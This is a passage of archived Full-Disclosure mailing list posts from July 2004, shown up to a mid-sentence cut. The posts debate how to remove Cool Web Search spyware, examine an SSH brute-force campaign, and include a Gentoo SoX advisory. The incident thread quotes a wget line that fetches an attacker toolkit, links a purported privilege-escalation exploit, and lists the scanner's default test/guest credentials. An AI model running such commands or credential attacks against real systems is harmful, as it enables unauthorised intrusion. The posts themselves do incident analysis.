at LEAST 5 variants of CWS. I have met them all and beat them all.

>
> This is part of a strong trend in unsolicited commercial software,
> copying survival techniques learned from virus authors. The use of
> constantly-loaded multiple DLLs and/or processes and/or services that
> all restart and repair each other if tampering is detected, is becoming
> widespread (see also CommonName, ClearSearch, TVMedia etc.).

All easily beaten by using HiJackThis in the way I described. If I can do
it, anyone with just a small amount of registry knowledge also can.

>
> Where there are not short-cut workarounds this means removing the
> software manually is simply impossible. Currently a trip into Safe Mode

Absolute and utter rot! I understand YOU may not be able to do it but it CAN
be done. It is simple logic if you want to look at it another way - whatever
can be DONE can be UNdone. The way I described works perfectly every time an
d takes 10 minutes or less to get rid of it though admittedly the first time
you use HiJackThis it can take longer.

> can do the trick, by stopping any of the software running, but I'm sure
> that'll be worked around too eventually. (Rootkit-like spyware?)
>

No, you are utterly wrong there, too. I have run Spybot and Adaware in safe
mode. Spybot sees and removes CWS but it comes back on next boot anyway. You
have to use HiJackThis to list the registry entries which stand out like a
sore thumb at that point. If you cant identify incorrect registry entries,
though, naturally it will elude you!

Greg.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

From: nicolas vigier (boklmmars-attacks.org)
Date: Fri Jul 30 2004 - 09:10:17 CDT

On Thu, 29 Jul 2004, Stefan Janecek wrote:

> The compromised machine was running an old debian woody installation
> which had not been upgraded for at least one year, the sshd version
> string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'

But that was not the default debian woody sshd ?
Woody has this one :
SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: Re: [Full-Disclosure] Cool Web Search

From: Rmuge NineFive (rmug9500lycos.co.uk)
Date: Fri Jul 30 2004 - 08:47:15 CDT

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.

Film & TV Extras urgently required in your area - See Yourself in major Films & TV? Call 0907 1512440 to Register. calls cost 150pm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple Vulnerabilities in Sendmail

From: George Capehart (capegeoopengroup.org)
Date: Fri Jul 30 2004 - 09:40:08 CDT

On Thursday 29 July 2004 22:57, Frank Knobbe allegedly wrote:

<snip>

>
> Heya George,
>
> perhaps the engineers are too busy fixing broken legal strategies and
> are putting silly software issues on the back=burner.
>
> (After all, why fix it if they file Chapter 11 by end of the year
> anyway?)

Hola Frank,

Naaaa. They won't need to do that . . . Microsoft needs them to carry
on the good fight against Open Source. They'll keep them afloat.
http://opensource.org/halloween/halloween10.html :)

Cheers,

/g

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
AW: [Full-Disclosure] Stateful Packet Inspection

issuni.de
Date: Fri Jul 30 2004 - 09:36:01 CDT

Look into the iptables/netfilter docs, located here:
http://www.netfilter.org/documentation/index.html

Connection tracking is explained here
http://www.sns.ias.edu/~jns/security/iptables/iptables_conntrack.html

Regards

Marco Ellmann

> -----Ursprüngliche Nachricht-----
> Von: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] Im Auftrag
> von Aaron Gray
> Gesendet: Freitag, 30. Juli 2004 14:45
> An: full-disclosurelists.netsys.com
> Betreff: [Full-Disclosure] Stateful Packet Inspection
>
> I am interested in finding information on SPI, either
> algorithms, and/or open source code,
>
> Hope you can help,
>
> TCS
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: Re: [Full-Disclosure] Cool Web Search

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 09:59:54 CDT

There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.

Film & TV Extras urgently required in your area - See Yourself in major
Films & TV? Call 0907 1512440 to Register. calls cost 150pm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Automated SSH login attempts? Related Cross post from incidents.org

From: Harris, Michael C. (HarrisMChealth.missouri.edu)
Date: Fri Jul 30 2004 - 10:31:08 CDT

 

-----Original Message-----
From: intrusions-bounceslists.sans.org
[mailto:intrusions-bounceslists.sans.org] On Behalf Of Andrew Daviel
Sent: Thursday, July 29, 2004 4:01 PM
To: intrusionsincidents.org
Subject: [Intrusions] Linux SSH scanning - test/guest

FYI

We got zapped by some hackers from, I think, Romania that have a priv
escalation exploit for Linux 2.4.20
http://sirzion.illusivecreations.com/loginxy

There is also a multithreaded SSH bruteforcer called "haita"
This attempts to login to machines using the accounts "test" and
"guest", with passwords "test" & "guest" respectively.
It runs from a file of addresses found by a synscan program. It
identifies itself as SSH-2.0-libssh-0.1

So, SSH login failures for test & guest are an indication of this thing
running at the remote end.

The two names & passwords appear to be hardcoded into the program.
Since Linux as I recall backs off after failed attempts there wouldn't
be much to gain by trying many more names, but variants may appear with
other defaults.

--
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376
securitytriumf.ca
_______________________________________________
Intrusions mailing list
Intrusionslists.sans.org
http://www.dshield.org/mailman/listinfo/intrusions
-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Todd Towles
Sent: Friday, July 30, 2004 7:53 AM
To: 'Jan Muenther'
Cc: full-disclosurelists.netsys.com
Subject: RE: [Full-Disclosure] Automated SSH login attempts?

Jan is right - looking at the code might be the only way to know what is
really happening.

We all await your disassembled, debugged and traced code analysis, Jan.
=)

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Jan
Muenther
Sent: Friday, July 30, 2004 6:52 AM
To: Andrew Farmer
Cc: Ali Campbell; full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Automated SSH login attempts?

Now, if anybody could jump through the hoop and send me the thing or
make it publicly available... all these things are musings, 'it looks as
if...' and 'it seems like...' are not exactly results of an analysis.

Just tracing tcpdump's output is definitely insufficient.
If the tool just sends normal TCP packets, then why does it need root
rights, which you typically only require for raw sockets to build
packets which can't be constructed with SOCK_STREAM or SOCK_DGRAM?

I hope you don't run it on your production boxes in the normal userland
- ever considered the fact it might contain an ELF infector or
something?
Now, if I wanted to deploy malware on a Linux box, I'd just come up with
a mysterious looking tool and let that infect the machines of people who
just run anything they can get a hold of. It's Linux, after all, right?
No viruses, right?

> >Do I take it that these things are just trying to log in using some
> >guessed password(s) ? Out of interest, do we have any idea what these

> >opportunistic passwords might be ?
>
> At least two of them are guest:guest and test:test. I'd guess that
> root:root and adminadmin are on the list too :-)

This things needs to be disassembled, debugged and traced. All else is
just whistling in the dark. Meh.

Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: Andrew Clover (and-bugtraqdoxdesk.com)
Date: Fri Jul 30 2004 - 10:13:43 CDT

Dave Horsfall <davehorsfall.org> wrote:

> Not really "new", in the scheme of things. Over 30 years ago, some bored
> prgrammer wrote something for one of the mainframes of the day (ICL?
> IBM? Burroughs?) called "Robin Hood and Friar Tuck".

Yeah, I was aware of this story; the Jargon File attributes it to Moto
staff working on Xerox CP-V. A few Win32 viruses copied the idea
(notably Gemini, see Virus Bulletin Sep02); this is what I meant by
parasite vendors stealing ideas from VXers.

The first parasite I saw using this trick was CommonName/Comwiz, but the
recent HuntBar/WinTools takes the biscuit by installing two processes,
one service and one BHO, all looking out for each other. Charming
behaviour for software purporting to be a search enhancer from a
'legitimate' company, eh?

I preferred viruses. You knew where you stood with viruses. They printed
a quote from a TV show and wiped your discs, you laughed at the funny
gag and reinstalled, everyone was happy. (Well, ish.)

Malware attaching its tentacles onto your machine to make a few dollars
from advertising and spam is just so much more offensively sleazy.

--
Andrew Clover
mailto:anddoxdesk.com
http://www.doxdesk.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200407-23 ] SoX: Multiple buffer overflows

From: Thierry Carrez (koongentoo.org)
Date: Fri Jul 30 2004 - 09:59:35 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-23
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: SoX: Multiple buffer overflows
      Date: July 30, 2004
      Bugs: #58733
        ID: 200407-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

SoX contains two buffer overflow vulnerabilities in the WAV header
parser code.

Background
==========

SoX is a command line utility that can convert various formats of
computer audio files in to other formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 media-sound/sox <= 12.17.4-r1 >= 12.17.4-r2

Description
===========

Ulf Harnhammar discovered two buffer overflows in the sox and play
commands when handling WAV files with specially crafted header fields.

Impact
======

By enticing a user to play or convert a specially crafted WAV file an
attacker could execute arbitrary code with the permissions of the user
running SoX.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version of SoX.

Resolution
==========

All SoX users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=media-sound/sox-12.17.4-r2"
    # emerge ">=media-sound/sox-12.17.4-r2"

References
==========

  [ 1 ] Full Disclosure Announcement

http://archives.neohapsis.com/archives/fulldisclosure/2004-07/1141.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200407-23.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFBCmJWvcL1obalX08RAijlAJ9C3qaGE3pW9JKve99S0qABwiTbuQCeKcn6
NdGB0d0mJHQx2OOZtYNdFEw=
=nuUa
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: Re: [Full-Disclosure] Cool Web Search

From: Dean Porter (deancenterpartners.com)
Date: Fri Jul 30 2004 - 11:35:09 CDT

HijackThis: http://www.merijn.org/files/hijackthis.zip
BHODemon 2.0: http://www.definitivesolutions.com/bhodemon.htm
BHPCop (CleanMyPC Registry Cleaner):
http://www.registry-cleaner.net/bho-manager.htm

Dean

-----Original Message-----
From: Todd Towles [mailto:toddtowlesbrookshires.com]
Sent: Friday, July 30, 2004 9:00 AM
To: 'Rmuge NineFive '; 'Disclosure Full'
Subject: RE: Re: [Full-Disclosure] Cool Web Search

There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.

Film & TV Extras urgently required in your area - See Yourself in major
Films & TV? Call 0907 1512440 to Register. calls cost 150pm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

Valdis.Kletnieksvt.edu
Date: Fri Jul 30 2004 - 11:27:39 CDT

On Fri, 30 Jul 2004 23:36:49 +1000, Gregh <chowsozemail.com.au> said:

> If you dont understand that then I can understand that you dont know how to
> get rid of it but the truth is that this way DOES get rid of it. There are
> at LEAST 5 variants of CWS. I have met them all and beat them all.

Beware... The fact that you have beaten all the ones you have met does not
imply either that you have beaten them all, or even that you have met them all.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBCnb7cC3lWbTT17ARAi1tAKDA6hak2fQi+JavaLv1W6bmfyieZACg3trC
RCVw+JWLX8dRexhDnxMM4sA=
=2nyI
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple Vulnerabilities in Sendmail

From: Barry Fitzgerald (bkfsecsdf.lonestar.org)
Date: Fri Jul 30 2004 - 09:34:41 CDT

Frank Knobbe wrote:

>(After all, why fix it if they file Chapter 11 by end of the year
>anyway?)
>
>
>

We can only hope... maybe if we get lucky they'll be forced to file in
September. Or, perhaps, just fall off the end of the earth... Yeah,
that'd be a good thing.

             -Barry

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: Re: [Full-Disclosure] Cool Web Search

kquesttoplayer.com
Date: Fri Jul 30 2004 - 11:25:22 CDT

You are probably talking about BHODemon,
which can be found at http://www.definitivesolutions.com/bhodemon.htm .

Kyle
-----Original Message-----
From: Todd Towles [mailto:toddtowlesbrookshires.com]
Sent: Friday, July 30, 2004 11:00 AM
To: 'Rmuge NineFive '; 'Disclosure Full'
Subject: RE: Re: [Full-Disclosure] Cool Web Search

There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.

Film & TV Extras urgently required in your area - See Yourself in major
Films & TV? Call 0907 1512440 to Register. calls cost 150pm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Neal O'Creat (idsll.mit.edu)
Date: Fri Jul 30 2004 - 08:39:55 CDT

Could it be possible that there are different versions of this, one
making noise and one much rarer one with an exploit?

-Neal

Andrei Galca-Vasiliu wrote:
> I've seen that too, on several machines, different range of ip's. I guess it`s
> some sort of a mass bruteforce exploit (there were 50 or more attempts on my
> box in just 20-30 s). Anyone who can enlighten us, it will be appreciated,
> i've searched too and couldn't find anything related.
>
> Intr-un mail de pe data de Thursday 22 July 2004 17:47, Jay Libove povestea:
>
>>[ Posted to full disclosure and vulnwatch; please edit reply address(es)
>>as appropriate. Thanks. -Jay ]
>>
>>My Linux system, and a Linux system run by a friend here in the same city
>>but on a completely different netblock (different ISP), have both seen
>>apparently automated attempts to log in to our systems via SSH in the past
>>few days. Looks like a script.
>>
>>
>>Here are some log entries from my system:
>>
>>Jul 15 10:01:34 panther6 sshd[8267]: Illegal user test from 62.67.45.4
>>Jul 15 10:01:34 panther6 sshd[8267]: Failed password for illegal user test
>>from 62.67.45.4 port 39141 ssh2 Jul 15 10:01:36 panther6 sshd[8269]:
>>Illegal user guest from 62.67.45.4 Jul 15 10:01:36 panther6 sshd[8269]:
>>Failed password for illegal user guest from 62.67.45.4 port 39192 ssh2 Jul
>>15 10:01:37 panther6 sshd[8271]: Illegal user admin from 62.67.45.4 Jul 15
>>10:01:37 panther6 sshd[8271]: Failed password for illegal user admin from
>>62.67.45.4 port 39234 ssh2 Jul 15 10:01:38 panther6 sshd[8273]: Illegal
>>user user from 62.67.45.4 Jul 15 10:01:38 panther6 sshd[8273]: Failed
>>password for illegal user user from 62.67.45.4 port 39275 ssh2 Jul 15
>>10:01:39 panther6 sshd[8275]: Failed password for root from 62.67.45.4 port
>>39340 ssh2 Jul 15 10:01:41 panther6 sshd[8277]: Failed password for root
>>from 62.67.45.4 port 39386 ssh2 Jul 15 10:44:12 panther6 sshd[8300]:
>>Illegal user test from 62.67.45.4 Jul 15 10:44:12 panther6 sshd[8300]:
>>Failed password for illegal user test from 62.67.45.4 port 33771 ssh2 Jul
>>15 10:44:14 panther6 sshd[8302]: Illegal user guest from 62.67.45.4 Jul 15
>>10:44:14 panther6 sshd[8302]: Failed password for illegal user guest from
>>62.67.45.4 port 33828 ssh2 Jul 15 10:44:15 panther6 sshd[8304]: Illegal
>>user admin from 62.67.45.4 Jul 15 10:44:15 panther6 sshd[8304]: Failed
>>password for illegal user admin from 62.67.45.4 port 33876 ssh2 Jul 15
>>10:44:16 panther6 sshd[8306]: Illegal user user from 62.67.45.4 Jul 15
>>10:44:16 panther6 sshd[8306]: Failed password for illegal user user from
>>62.67.45.4 port 33916 ssh2 Jul 15 10:44:17 panther6 sshd[8308]: Failed
>>password for root from 62.67.45.4 port 33988 ssh2 Jul 15 10:44:19 panther6
>>sshd[8310]: Failed password for root from 62.67.45.4 port 34032 ssh2 Jul 15
>>17:07:15 panther6 sshd[8912]: Illegal user test from 131.234.36.152 Jul 15
>>17:07:15 panther6 sshd[8912]: Failed password for illegal user test from
>>131.234.36.152 port 38287 ssh2 Jul 15 17:07:16 panther6 sshd[8914]: Illegal
>>user guest from 131.234.36.152 Jul 15 17:07:16 panther6 sshd[8914]: Failed
>>password for illegal user guest from 131.234.36.152 port 38326 ssh2 Jul 15
>>17:07:18 panther6 sshd[8916]: Illegal user admin from 131.234.36.152 Jul 15
>>17:07:18 panther6 sshd[8916]: Failed password for illegal user admin from
>>131.234.36.152 port 38370 ssh2 Jul 15 17:07:19 panther6 sshd[8918]: Illegal
>>user admin from 131.234.36.152 Jul 15 17:07:19 panther6 sshd[8918]: Failed
>>password for illegal user admin from 131.234.36.152 port 38412 ssh2 Jul 15
>>17:07:21 panther6 sshd[8920]: Illegal user user from 131.234.36.152 Jul 15
>>17:07:21 panther6 sshd[8920]: Failed password for illegal user user from
>>131.234.36.152 port 38468 ssh2 Jul 15 17:07:22 panther6 sshd[8922]: Failed
>>password for root from 131.234.36.152 port 38516 ssh2 Jul 15 17:07:23
>>panther6 sshd[8924]: Failed password for root from 131.234.36.152 port
>>38558 ssh2 Jul 15 17:07:25 panther6 sshd[8926]: Failed password for root
>>from 131.234.36.152 port 38611 ssh2 Jul 15 17:07:26 panther6 sshd[8928]:
>>Illegal user test from 131.234.36.152 Jul 15 17:07:26 panther6 sshd[8928]:
>>Failed password for illegal user test from 131.234.36.152 port 38675 ssh2
>>Jul 19 22:05:07 panther6 sshd[30439]: Illegal user test from 83.103.27.66
>>Jul 19 22:05:07 panther6 sshd[30439]: Failed password for illegal user test
>>from 83.103.27.66 port 52671 ssh2 Jul 19 22:05:08 panther6 sshd[30441]:
>>Illegal user guest from 83.103.27.66 Jul 19 22:05:08 panther6 sshd[30441]:
>>Failed password for illegal user guest from 83.103.27.66 port 52687 ssh2
>>Jul 21 06:30:12 panther6 sshd[1103]: Illegal user test from 219.103.193.130
>>Jul 21 06:30:12 panther6 sshd[1103]: Failed password for illegal user test
>>from 219.103.193.130 port 55802 ssh2 Jul 21 06:30:14 panther6 sshd[1105]:
>>Illegal user guest from 219.103.193.130 Jul 21 06:30:14 panther6
>>sshd[1105]: Failed password for illegal user guest from 219.103.193.130
>>port 55823 ssh2
>>
>>
>> .. and some log entries from my friend's system:
>>
>>Jul 19 21:04:33 quack sshd[28379]: Illegal user test from 131.234.157.10
>>Jul 19 21:04:34 quack sshd[28381]: Illegal user guest from 131.234.157.10
>>Jul 19 21:04:36 quack sshd[28383]: Illegal user admin from 131.234.157.10
>>Jul 19 21:04:37 quack sshd[28385]: Illegal user admin from 131.234.157.10
>>Jul 19 21:04:38 quack sshd[28387]: Illegal user user from 131.234.157.10
>>Jul 19 21:04:43 quack sshd[28400]: Illegal user test from 131.234.157.10
>>Jul 22 09:39:10 quack sshd[7646]: Illegal user test from 156.17.99.11
>>Jul 22 09:39:11 quack sshd[7648]: Illegal user guest from 156.17.99.11
>>
>>
>>I have not seen any notes about this on the vulnerability disucssion
>>lists. Has anyone else noticed it? What specific vulnerability (or
>>default password?) is this looking for?
>>
>>-Jay Libove, CISSP
>>libovefelines.org
>>Atlanta, GA US
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

From: morning_wood (se_cur_ityhotmail.com)
Date: Fri Jul 30 2004 - 12:06:20 CDT

> wgte frauder.us/linux/ssh.tgz
http://frauder.us serves up putty.exe ( v 0.54 ) on connect
as "frauder", no extension. Proally not your average admin
tool setup...

m.wood

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: Re: [Full-Disclosure] Cool Web Search

From: Brendan Dolan-Gavitt (mooyixgmail.com)
Date: Fri Jul 30 2004 - 12:16:17 CDT

On Fri, 30 Jul 2004 09:59:54 -0500, Todd Towles
<toddtowlesbrookshires.com> wrote:
> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?

It should be at
http://www.spywareinfo.com/~merijn/downloads.html

but spywareinfo.com seems to be down right now.

A list of current known BHOs is at
http://sysinfo.org/

I can attest as a university Helpdesk person that current
spyware/adware is a far larger problem than normal viruses and trojans
 right now...

-Brendan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: JacK (jackwebsecurite.org)
Date: Fri Jul 30 2004 - 12:16:13 CDT

Message: 30
From: "Gregh" <chowsozemail.com.au>

> Sorry but totally and utterly incorrect. You just do NOT understand what I
> have typed. I said that I used HiJackThis to list the entries in a group
> then ticked them manually and then removed them. Along with that, it
> allowed
> you to identify the exe files that went with it.

Rather you don't understand what we are speaking about : we discuss new
tricky CWS variants

> If you dont understand that then I can understand that you dont know how
> to
> get rid of it but the truth is that this way DOES get rid of it. There are
> at LEAST 5 variants of CWS. I have met them all and beat them all.

Oh ? I know at least 30 :-D
The old ones are very kind and you can easily get rid of it the way you give
but for the new ons, you may forget it :o)

If you don't understand that there are new variants, it's useless trying to
explain how to get rid of the classic variants : anybody know how to handle
them. It DOES NOT WORK for the newer variants. Is that beyond your
understanding ?

Regards,
--
JacK

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: Re: [Full-Disclosure] Cool Web Search

From: Goudie, Derek (derek.goudieearthtech.ca)
Date: Fri Jul 30 2004 - 12:40:11 CDT

http://www.definitivesolutions.com/bhodemon.htm

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Todd Towles
Sent: Friday, July 30, 2004 9:00 AM
To: 'Rmuge NineFive '; 'Disclosure Full'
Subject: RE: Re: [Full-Disclosure] Cool Web Search

There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.

Film & TV Extras urgently required in your area - See Yourself in major
Films & TV? Call 0907 1512440 to Register. calls cost 150pm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Automated SSH login attempts?

From: Dan Margolis (krispykringlegentoo.org)
Date: Fri Jul 30 2004 - 12:35:14 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I've compiled a handful of notes and relevant files at
http://dev.gentoo.org/~krispykringle/sshnotes.txt .

If anybody has any more information or can derive more information from
these files than I have so far, please let me know.

- --
Dan ("KrispyKringle")
Gentoo Linux Security Coordinator
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iQEVAwUBQQqG0bDO2aFJ9pv2AQJwBQf/dhXUNFBgSgfIfefCLrzYNFwr/ejwku6O
5QvqQ/xgifi0KWy+NqbW5IIv44ibY+9j3a6PTA8Nt47kgu9vDQPB/gFsU8Mht8l8
FZQYnHj/tME1tpT5zgMvXA5Tn9vUKf9PXV5s9uCw5o65hbMPPmT+1PpVe27D74H2
f3BtHcqGA6yZMScqc7DQmUehh9cdKcS8CM8//hYmLiNP+esUMfd3ZvE5mY4J8dxE
OEJf6Zdhr6T9+y1BkHuZOmbqASL3YGV3yuYv4j9YPiMvNnL3sdFSOYcXA3ZQc6xu
1YbQp8lNsYMeW1bWk1hTmoF/bR0JUiPyXVPqRKot206Mf4JOgWPdUw==
=sENF
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: Re: [Full-Disclosure] Cool Web Search

From: KUIJPERS Jimmy (Jimmy.KUIJPERSswift.com)
Date: Fri Jul 30 2004 - 12:11:46 CDT

Yep, BHODeamon is the best. Especially the newest version has some major improvements.

Don't have the link but it's very googable and the site is something like www.bhodeamon.com orso.

Cheers
 

-----Original Message-----
From: full-disclosure-adminlists.netsys.com [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Todd Towles
Sent: Friday, July 30, 2004 5:00 PM
To: 'Rmuge NineFive '; 'Disclosure Full'
Subject: RE: Re: [Full-Disclosure] Cool Web Search

There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.

Film & TV Extras urgently required in your area - See Yourself in major
Films & TV? Call 0907 1512440 to Register. calls cost 150pm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  • application/x-pkcs7-signature attachment: smime.p7s
 
Re: Re: [Full-Disclosure] Cool Web Search

From: JacK (jackwebsecurite.org)
Date: Fri Jul 30 2004 - 11:56:26 CDT

> I don't know if you fully understand HiJackThis or maybe I was just
> unclear.

> HiJackThis wasn't used by me to get rid of CWS as, for example, running
> Adaware gets rid of tracking cookies and some installed spyware progs. It
> was used by me to list various entries in registry which, when lumped
> together like that, show off CWS quite easily. Once they are there,
> removing
> them and the progs started by some of them is easy.

> That is all you have to do. Don't expect HiJackThis to magically get rid
> of
> it all at the flick of a button. You DO have to have a small amount of
> registry knowledge in order to ID which entries are seriously bull and
> which
> are honest BHOs etc. I am not a registry "expert" but claim a small amount
> of registry knowledge so even to ME it was obvious what was what.

It 's obvious you did not get the variants I am speaking about and you are
no Registry "expert" ;)

For those variants :

